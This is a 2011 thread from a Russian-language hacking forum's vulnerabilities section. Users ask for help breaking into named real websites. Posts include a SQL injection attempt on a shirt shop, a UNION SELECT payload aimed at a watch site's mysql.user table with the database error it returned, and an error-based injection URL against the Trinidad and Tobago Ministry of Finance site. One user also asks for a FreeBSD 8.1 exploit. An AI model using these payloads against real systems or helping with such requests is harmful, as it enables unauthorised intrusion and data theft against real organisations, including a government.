HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18881  
Старый 16.12.2011, 19:27
meskaline
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

В редакторе в админке при добавлении вот такого кода сохраняется вот такая штука как обойти её?
 
Ответить с цитированием

  #18882  
Старый 16.12.2011, 22:35
system331
Новичок
Регистрация: 19.12.2008
Сообщений: 18
Провел на форуме:
14226

Репутация: 0
Отправить сообщение для system331 с помощью ICQ
По умолчанию

есть такой скрипт http://funny-shirt.ru/cat/110/page/1

если прописать так http://funny-shirt.ru/cat/110/page/199999999999999999999999999999999999999999 вадыеш sql ошибку.

но буквы режет, цыфры принимает, помогите раскрутить
 
Ответить с цитированием

  #18883  
Старый 16.12.2011, 22:40
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от system331  
system331 said:
есть такой скрипт http://funny-shirt.ru/cat/110/page/1
если прописать так http://funny-shirt.ru/cat/110/page/199999999999999999999999999999999999999999 вадыеш sql ошибку.
но буквы режет, цыфры принимает, помогите раскрутить
это не скуля

_http://funny-shirt.ru/cat/110/page/1*1

_http://funny-shirt.ru/cat/110/page/1*2
 
Ответить с цитированием

  #18884  
Старый 16.12.2011, 22:53
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Цитата:
Сообщение от None  
интересно, чем и как ты будешь снифать чтобы узнать что скрываеться под чпу ?
Обновим страничку (во время запущенного сниффера), и по идее, высвечивается полный адрес
 
Ответить с цитированием

  #18885  
Старый 16.12.2011, 23:23
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от Osstudio  
Osstudio said:
Обновим страничку (во время запущенного сниффера), и по идее, высвечивается полный адрес
Где найти такой сниффер? (или отсыпь хотя бы то, что ты постоянно куришь)
 
Ответить с цитированием

  #18886  
Старый 17.12.2011, 00:07
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

Есть чтонить под

FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?
 
Ответить с цитированием

  #18887  
Старый 17.12.2011, 00:14
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от IMMORTAL_S  
IMMORTAL_S said:
Есть чтонить под
FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?
В паблике точно нету..
 
Ответить с цитированием

  #18888  
Старый 17.12.2011, 15:18
RFOPlayer
Guest
Сообщений: n/a
Провел на форуме:
730

Репутация: 0
По умолчанию

при запросе:

Цитата:
Сообщение от None  
http://www.xxx.ru/showimg.php?id=-245+UNION+SELECT+1,2,3,4,5,6,7,8,9,file_priv+from+ mysql.user+where+user=0x6f626c61646d696e5f32--
выдается ошибка:

Цитата:
Сообщение от None  
In module "/showimg.php" found error ="SELECT command denied to user 'u14678'@'10.8.0.28' for table 'user'" in query "select id_watch,title, fnameb, mex, korp, bras, glass, water, newe,opis from watch where id_watch=-245 UNION SELECT 1,2,3,4,5,6,7,8,9,file_priv from mysql.user where user=0x6f626c61646d696e5f32--"
что не так делаю?
 
Ответить с цитированием

  #18889  
Старый 17.12.2011, 15:30
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Цитата:
Сообщение от IMMORTAL_S  
IMMORTAL_S said:
Есть чтонить под
FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?
пробовал?

Цитата:
Сообщение от RFOPlayer  
RFOPlayer said:
что не так делаю?
а у тебя просто прав имхо нет
__________________
 
Ответить с цитированием

  #18890  
Старый 17.12.2011, 17:32
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

www.finance.gov.tt/publications.php?mid=192+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+--+

Ministry of Finance, Republic of Trinidad and Tobago не хочет крититься...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ